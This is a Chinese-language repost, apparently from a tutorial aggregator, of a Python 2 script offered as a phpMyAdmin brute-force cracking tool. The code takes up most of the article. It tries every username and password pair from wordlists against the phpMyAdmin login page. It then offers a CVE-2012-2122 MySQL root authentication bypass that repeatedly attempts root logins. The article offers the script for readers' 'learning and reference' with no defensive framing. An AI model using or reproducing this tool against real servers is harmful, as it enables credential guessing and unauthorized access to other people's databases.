Python写的PHPMyAdmin暴力破解工具代码
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了Python写的PHPMyAdmin暴力破解工具代码,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含1564字,纯文字阅读大概需要3分钟。
内容图文
PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。#!/usr/bin/env python import urllib import urllib2 import cookielib import sys import subprocess def Crack(url,username,password): opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())) headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'} params = urllib.urlencode({'pma_username': username, 'pma_password': password}) request = urllib2.Request(url+"/index.php", params,headers) response = opener.open(request) a=response.read() if a.find('Database server')!=-1 and a.find('name="login_form"')==-1: return username,password return 0 def MySQLAuthenticationBypassCheck(host,port): i=0 while i<300: i=i+1 subprocess.Popen("mysql --host=%s -P %s -uroot -piswin" % (host,port),shell=True).wait() if __name__ == '__main__': if len(sys.argv)<4: print "#author:iswin\n#useage python pma.py http://www.gxlcms.com/phpmyadmin/ username.txt password.txt" sys.exit() print "Bruting,Pleas wait..." for name in open(sys.argv[2],"r"): for passw in open(sys.argv[3],"r"): state=Crack(sys.argv[1],name,passw) if state!=0: print "\nBrute successful" print "UserName: "+state[0]+"PassWord: "+state[1] sys.exit() print "Sorry,Brute failed...,try to use MySQLAuthenticationBypassCheck" choice=raw_input('Warning:This function needs mysql environment.\nY:Try to MySQLAuthenticationBypassCheck\nOthers:Exit\n') if choice=='Y' or choice=='y': host=raw_input('Host:') port=raw_input('Port:') MySQLAuthenticationBypassCheck(host,port)
内容总结
以上是互联网集市为您收集整理的Python写的PHPMyAdmin暴力破解工具代码全部内容,希望文章能够帮你解决Python写的PHPMyAdmin暴力破解工具代码所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。